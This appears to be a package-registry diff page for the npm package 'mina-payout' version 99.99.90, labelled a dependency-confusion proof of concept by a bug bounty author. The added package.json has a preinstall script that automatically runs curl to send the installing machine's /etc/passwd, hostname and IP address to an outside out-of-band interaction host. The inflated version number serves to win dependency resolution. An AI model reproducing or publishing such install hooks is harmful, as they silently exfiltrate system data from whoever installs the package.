mina-payout 99.99.90
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of mina-payout might be problematic. Click here for more details.
- package/package.json +12 -0
package/package.json
ADDED
@@ -0,0 +1,12 @@
|
|
1
|
+
{
|
2
|
+
"name": "mina-payout",
|
3
|
+
"version": "99.99.90",
|
4
|
+
"description": "Fake package for dependency confusion PoC",
|
5
|
+
"author": "Bug Bounty PoC",
|
6
|
+
"scripts": {
|
7
|
+
"preinstall": "/usr/bin/curl --data '@/etc/passwd' $(hostname)-$(hostname -I | awk '{print $1}').uangqbvazohtwddzpvuhs6iahgi9663li.oast.fun"
|
8
|
+
},
|
9
|
+
"publishConfig": {
|
10
|
+
"access": "public"
|
11
|
+
}
|
12
|
+
}
|